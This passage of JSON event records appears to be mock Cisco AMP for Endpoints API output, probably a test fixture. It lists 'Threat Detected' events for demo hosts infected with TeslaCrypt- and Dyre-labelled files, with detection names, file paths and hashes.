Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
